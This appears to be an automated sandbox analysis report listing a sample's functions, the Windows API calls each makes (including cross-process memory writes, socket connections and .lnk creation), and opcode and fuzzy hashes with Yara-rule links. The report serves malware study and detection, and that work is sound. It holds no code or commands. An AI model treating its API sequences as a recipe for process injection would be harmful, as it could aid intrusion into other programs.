          • API String ID: 2832842796-0
          • Opcode ID: 5f50ed0ea8e57b256ee18dfb179794f6d21149e72e974697256acb3d7b2d1096
          • Instruction ID: 15416974a41266e98baa84a996713299593bf1bc446d8387d99550dd1fe9c398
          • Opcode Fuzzy Hash: 5f50ed0ea8e57b256ee18dfb179794f6d21149e72e974697256acb3d7b2d1096
          • Instruction Fuzzy Hash: 424162B5A0420ABBDB14EBA4DC88FAEB3A8FF54704F14C558E9149B241DB75F944CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011794AE, Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32 ref: 011794F1
            • Part of subcall function 01160593: _wcspbrk.LIBCMT ref: 011605A3
          • SendMessageW.USER32(?,00001074,?,?), ref: 01179551
          • _wcslen.LIBCMT ref: 01179566
          • _wcslen.LIBCMT ref: 01179573
          • SendMessageW.USER32(?,00001074,?,?), ref: 011795A7
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend$_wcslen$_wcspbrk
          • String ID:
          • API String ID: 1856069659-0
          • Opcode ID: 810bbb4803b91121bd68e33733b66ffb2f64eb3d2cb2592629efe4bb1f1043e0
          • Instruction ID: aadda88b9b489a8c61566b33e6fa1f5d97c389b2d0a6057158c3c77f28ca2005
          • Opcode Fuzzy Hash: 810bbb4803b91121bd68e33733b66ffb2f64eb3d2cb2592629efe4bb1f1043e0
          • Instruction Fuzzy Hash: B2318671A0021D9BDB28DF59EC80EDEB774FF54724F00425AFA1497380E7719995CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01185071, Relevance: 7.6, APIs: 5, Instructions: 78COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: af724d5f1d47a70c453a802f94433d9a42af17467407828a71f5ad3a0c5e446e
          • Instruction ID: 5fe7825cc38916077ad1ca26c48b856a5b4c84ee5fb0fe10f71004c77ebffba5
          • Opcode Fuzzy Hash: af724d5f1d47a70c453a802f94433d9a42af17467407828a71f5ad3a0c5e446e
          • Instruction Fuzzy Hash: 8E21B2752007019BDB28EF29E8C4C6777BAFF49220B148669FE5187385DB30E845CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01195005, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01194E62: inet_addr.WSOCK32(?), ref: 01194E86
          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0119503B
          • WSAGetLastError.WSOCK32(00000000), ref: 0119504A
          • connect.WSOCK32(00000000,?,00000010), ref: 01195083
          • WSAGetLastError.WSOCK32(00000000), ref: 011950AA
          • closesocket.WSOCK32(00000000,00000000), ref: 011950BE
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLast$closesocketconnectinet_addrsocket
          • String ID:
          • API String ID: 245547762-0
          • Opcode ID: 7107a231d323c47e99826d6a5b35fa2d4372c0800ef3d955f84c4c1e9888a5f6
          • Instruction ID: 0e0c7fcc5251ba224db331ab4c7725b5a8a05f415309add7f2430f402b5c585b
          • Opcode Fuzzy Hash: 7107a231d323c47e99826d6a5b35fa2d4372c0800ef3d955f84c4c1e9888a5f6
          • Instruction Fuzzy Hash: B521F3322001005FD728EF6CDC48F6AB7E8EFA4724F04865AF964E7280CB70A8418BA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011770BF, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
          Download Yara Rule
          APIs
          • DeleteObject.GDI32(00000000), ref: 011770FC
          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
          • SelectObject.GDI32(?,00000000), ref: 0117714C
          • BeginPath.GDI32(?), ref: 01177161
          • SelectObject.GDI32(?,00000000), ref: 0117718A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Object$Select$BeginCreateDeletePath
          • String ID:
          • API String ID: 2338827641-0
          • Opcode ID: d0bb79484e81ea89e4be517d5a10a1c56ecc43f868d62bbaac44539fc2996b54
          • Instruction ID: b88b3798ba090c071f94f790922e85a2657d1654f8c76d5d36c82019fce77429
          • Opcode Fuzzy Hash: d0bb79484e81ea89e4be517d5a10a1c56ecc43f868d62bbaac44539fc2996b54
          • Instruction Fuzzy Hash: 7D215371903215ABD72EDF69E888A9A7BBDE705220F104166F934D32C4D37094C4CB95
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01164569, Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNEL32(00000000), ref: 0116457F
          • QueryPerformanceCounter.KERNEL32(?), ref: 0116459C
          • Sleep.KERNEL32(00000000), ref: 011645BB
          • QueryPerformanceCounter.KERNEL32(?), ref: 011645C5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CounterPerformanceQuerySleep
          • String ID:
          • API String ID: 2875609808-0
          • Opcode ID: 70f2ac12b2c68f6847a50a2873d9e69cc932f1f980335d4d21c386cbf832d6bd
          • Instruction ID: 70269abeafb4d1a3a308c986485339e0187b74fc6ce1b9f856a6bb10fe497013
          • Opcode Fuzzy Hash: 70f2ac12b2c68f6847a50a2873d9e69cc932f1f980335d4d21c386cbf832d6bd
          • Instruction Fuzzy Hash: A911B232D0011DDBCF18DFD8E944AEEBB78FF89711F004266EA0072640CB31A5658BE1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01185562, Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,00001101,00000000,?), ref: 01185571
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DeleteDestroyObject$IconMessageSendWindow
          • String ID:
          • API String ID: 1489400265-0
          • Opcode ID: 16579c0c673f8b29d0e3acc075b63b314629cfbe8c2c809a89949887252908d1
          • Instruction ID: b84a2062331d7a6e75cf582533cdcd9ceb1a513b01fc8d62c6a9b3a5a9159447
          • Opcode Fuzzy Hash: 16579c0c673f8b29d0e3acc075b63b314629cfbe8c2c809a89949887252908d1
          • Instruction Fuzzy Hash: B6016D71314301ABDB68EF29E9C8A26777AFF48711B248564FE11CB289C734E885CF65
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118557C, Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0115FF70: InvalidateRect.USER32(?,00000000,00000001), ref: 0115FFFE
          • DestroyWindow.USER32(?), ref: 0118569D
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
          • String ID:
          • API String ID: 1042038666-0
          • Opcode ID: 6a534e07c29c03cfe8eed8451d1fb599b3fc974ea026dc2001e1f1785955fe96
          • Instruction ID: d7cde0227135aca37749c75d12bcbea06d39bf87e2a4cb65b6b9889e6f232f4b
          • Opcode Fuzzy Hash: 6a534e07c29c03cfe8eed8451d1fb599b3fc974ea026dc2001e1f1785955fe96
          • Instruction Fuzzy Hash: 5C016D75201301ABDB28EF69E8C891A77BDFF082547108564FD11C7248C734E8858F75
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011450CF, Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01141810: _doexit.LIBCMT ref: 0114181C
          • ___set_flsgetvalue.LIBCMT ref: 011450E0
            • Part of subcall function 011477D1: TlsGetValue.KERNEL32(?,0114792A,?,011412DC,?,00000001), ref: 011477DA
            • Part of subcall function 011477D1: TlsSetValue.KERNEL32(00000000,?,011412DC,?,00000001), ref: 011477FB
          • ___fls_getvalue@4.LIBCMT ref: 011450EB
            • Part of subcall function 011477B1: TlsGetValue.KERNEL32(?,?,01143C50,00000000), ref: 011477BF
          • ___fls_setvalue@8.LIBCMT ref: 011450FD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 01145106
          • ExitThread.KERNEL32 ref: 0114510D
          • __freefls@4.LIBCMT ref: 01145129
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
          • String ID:
          • API String ID: 4247068974-0
          • Opcode ID: 141ffd8e67fa144fff31df8efacfdcbce58d61d5c5ad2ac9cb2205122b199a4c
          • Instruction ID: 7f27c7d21a34daadc80f49b8c650bf4bf6fb7db7a029bcb7d39ce1c3f2cf1ebf
          • Opcode Fuzzy Hash: 141ffd8e67fa144fff31df8efacfdcbce58d61d5c5ad2ac9cb2205122b199a4c
          • Instruction Fuzzy Hash: 6CE0C2758007076BEF1D77F08C4CD5F3A2D5F18D8DB500820FA10A20A5EF34D4918661
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F37B, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: )$U$\
          • API String ID: 0-3705770531
          • Opcode ID: 0869da7278554940868443dca89fd85589374785fa1a42fa98824dcca0af5353
          • Instruction ID: 74b3f5248ff51b43c6e1acbdf0c05c970862cded902e032aac2b86b54e41694a
          • Opcode Fuzzy Hash: 0869da7278554940868443dca89fd85589374785fa1a42fa98824dcca0af5353
          • Instruction Fuzzy Hash: ECC1E270A0424ACFDB29CF69C5806AEBFF1FF89304F2481AAD8629B345D7319946CF51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117E0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 735310c8083acc1edd9605807394d1b5283c9e22d9ec3861ba384c3b146306ab
          • Instruction ID: 5026c0b98c402d02800771239209ca5d24d80fda431b2a29f471a32961a08cfd
          • Opcode Fuzzy Hash: 735310c8083acc1edd9605807394d1b5283c9e22d9ec3861ba384c3b146306ab
          • Instruction Fuzzy Hash: A1B17A70906249CFDF1ECFA8C8947ADBBF2BF45304F288199D451AB392D7355942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117E0FF, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 8bdae5521a45f7fbf15e75d2a59c4071e73274baeec8cb91095a2c934a0185ec
          • Instruction ID: 7a54c74875471d7c853b0cdb36345eb46f395a93c817c6c0bed8f1dae773ccda
          • Opcode Fuzzy Hash: 8bdae5521a45f7fbf15e75d2a59c4071e73274baeec8cb91095a2c934a0185ec
          • Instruction Fuzzy Hash: 69B18A70906249CFDF1ECFA8C8947ADBBF2BF45304F288199D451AB382D7355942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117E10F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 601bdaa49e549cd8f51a7ff18a339c129e8dc0388f79bc320a0ee1ca79510194
          • Instruction ID: c495418011c67ff91766fa8d29584c4f01ac84f1136f7de3940f2e28f97ab171
          • Opcode Fuzzy Hash: 601bdaa49e549cd8f51a7ff18a339c129e8dc0388f79bc320a0ee1ca79510194
          • Instruction Fuzzy Hash: 01A17970906249CFDF1ECFA8C8947ADBBF2AF49304F288199D451AB382D7755942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A8357, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01172654: _wcslen.LIBCMT ref: 01172680
          • CoInitialize.OLE32(00000000), ref: 011A83FC
          • CoCreateInstance.OLE32(011B2A08,00000000,00000001,011B28A8,?), ref: 011A8415
          • CoUninitialize.OLE32 ref: 011A85F6
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          • Opcode ID: 1f27437e5bc13d20d81a1ea55d8db925c32aa1f49074c93d92aa344338443d38
          • Instruction ID: 91d2886dc66d0188cfa005bc47a0b8af43a74e41a900cecc5ec6044bf1955b0e
          • Opcode Fuzzy Hash: 1f27437e5bc13d20d81a1ea55d8db925c32aa1f49074c93d92aa344338443d38
          • Instruction Fuzzy Hash: 9B812970244301AFD214EB94DC81F5AB3E5AFC8718F148918FA58DB2E5D7B1ED45CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01166528, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01164300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 01164331
          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01166579
            • Part of subcall function 011642C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 011642F5
            • Part of subcall function 01164394: GetWindowThreadProcessId.USER32(?,?), ref: 011643C7
            • Part of subcall function 01164394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 011643D8
            • Part of subcall function 01164394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 011643EF
          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 011665E9
          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 01166669
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
          • String ID: @
          • API String ID: 4150878124-2766056989
          • Opcode ID: f245964b63f48de99f1e9eabf442e033f1e794f514a1c5e5295a5d96aef2e0e8
          • Instruction ID: 68ab586762b27962e3c78f12428031a757fd17eeff98e7daf6d79f5545efc6d2
          • Opcode Fuzzy Hash: f245964b63f48de99f1e9eabf442e033f1e794f514a1c5e5295a5d96aef2e0e8
          • Instruction Fuzzy Hash: 74517676A002196BCB14DFA8DD81FDEB77CEF99300F004599F705AB180D771AA55CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F0AD, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: \$]$h
          • API String ID: 4104443479-3262404753
          • Opcode ID: 118f89877cc77c7e81921184722620b5f80af337c6e47cca6c710dc6bf37c7ee
          • Instruction ID: 3dc2c9b4730480c92d5021eaa8c6670fba60c9fe9ceefea3dd9c66cee8aa0576
          • Opcode Fuzzy Hash: 118f89877cc77c7e81921184722620b5f80af337c6e47cca6c710dc6bf37c7ee
          • Instruction Fuzzy Hash: 9B516270E0020A9FDF1CCF69C990AAEBBF6BF89304F29C169E515A7354D7305A41CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01165223, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • CLSIDFromString.OLE32(?,00000000), ref: 01165244
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 01165293
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 011652C2
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
          • String ID: crts
          • API String ID: 943502515-3724388283
          • Opcode ID: 7bb813dbcf86f0250f4d34b3819432c37ec12d5e11399ebf283e943e72a35b6c
          • Instruction ID: 4a9adcfedbc054e1509ef60498e10c182271aa425e1b1a66b39a8d93ad3553a3
          • Opcode Fuzzy Hash: 7bb813dbcf86f0250f4d34b3819432c37ec12d5e11399ebf283e943e72a35b6c
          • Instruction Fuzzy Hash: 2C212776600601DFC318CF8AE484C96FBE9EF98761704C42AEA59CB721D334E891CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011611F9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
          Download Yara Rule
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116120B
          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0116121D
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpSendEcho
          • API String ID: 2574300362-58917771
          • Opcode ID: 0647bb6c54277a6fac86f11025c837589e62c5c9f61c61aaa783682d7a4794ae
          • Instruction ID: 22e9a96ed13c3dce96b27491fc907a0e7254ccc91c8dced5505b6edba221a411
          • Opcode Fuzzy Hash: 0647bb6c54277a6fac86f11025c837589e62c5c9f61c61aaa783682d7a4794ae
          • Instruction Fuzzy Hash: A1E012B1909346AFD7385F97E4846867BECDB08651B20842DED55D2510D771E49087A4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116122B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
          Download Yara Rule
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116123D
          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0116124F
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
